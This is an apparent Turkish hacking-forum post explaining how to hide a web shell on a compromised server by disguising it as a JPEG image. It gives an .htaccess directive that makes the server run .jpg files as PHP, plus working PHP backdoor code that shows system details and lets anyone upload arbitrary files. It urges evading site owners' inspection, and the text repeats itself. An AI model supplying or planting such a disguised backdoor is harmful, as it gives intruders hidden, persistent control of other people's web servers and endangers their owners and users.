-
Akifcan Hür
☾★ T'ÜRK ☾★
Girdiğiniz sunucu & hostinglere attığınız sheller çok çabuk göze çarpıyor ve bulunuyorlar , bunun sebebi tabiki olası uzantılarının .php olması , yani site sahipleri ne aradıklarını gayet iyi biliyorlar , hiçbiri bir resim dosyasını açıp bakmaz ama php uzantılı tüm dosyaları incelerler.
Bizde madem öyle , shellimizi .jpg uzantılı yükleyip farkedilmez yapacağız. Öncelikle aşağıdaki .htaccess dosyasını backkdorlu jpg resim dosyamızın olduğu dizine yüklüyoruz.
AddType application/x-httpd-php .jpg
Sonrasında ise picture.jpg adlı dosyamızı oluşturup bir txt editor ile açıp aşağıdaki kodları imaj dosyamıza kayıt edip kapatıyoruz ve htaccessi yüklediğimiz dizine bunuda yüklüyoruz.
<?php
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
else { echo '<b>Basarisiz</b><br><br>'; }
}
?>
Evet artık backdoorumuz yani picture.jpg adlı dosyamız bir php gibi davranacak ve bundan kimsenin haberi olmayacak , siz siteyi www.norslar.org/images/picutre.jpg şeklinde açtığınızda backdoorunuz ile karşılacaksınız.
not: picture.jpg nin içine istediğiniz türden php kodu ekleyebilirsiniz , istediğiniz shellin kodlarını yerleştirebilirsiniz , gerisi size kalmış birşey.
Bizde madem öyle , shellimizi .jpg uzantılı yükleyip farkedilmez yapacağız. Öncelikle aşağıdaki .htaccess dosyasını backkdorlu jpg resim dosyamızın olduğu dizine yüklüyoruz.
AddType application/x-httpd-php .jpg
Sonrasında ise picture.jpg adlı dosyamızı oluşturup bir txt editor ile açıp aşağıdaki kodları imaj dosyamıza kayıt edip kapatıyoruz ve htaccessi yüklediğimiz dizine bunuda yüklüyoruz.
<?php
echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
else { echo '<b>Basarisiz</b><br><br>'; }
}
?>
Evet artık backdoorumuz yani picture.jpg adlı dosyamız bir php gibi davranacak ve bundan kimsenin haberi olmayacak , siz siteyi www.norslar.org/images/picutre.jpg şeklinde açtığınızda backdoorunuz ile karşılacaksınız.
not: picture.jpg nin içine istediğiniz türden php kodu ekleyebilirsiniz , istediğiniz shellin kodlarını yerleştirebilirsiniz , gerisi size kalmış birşey.
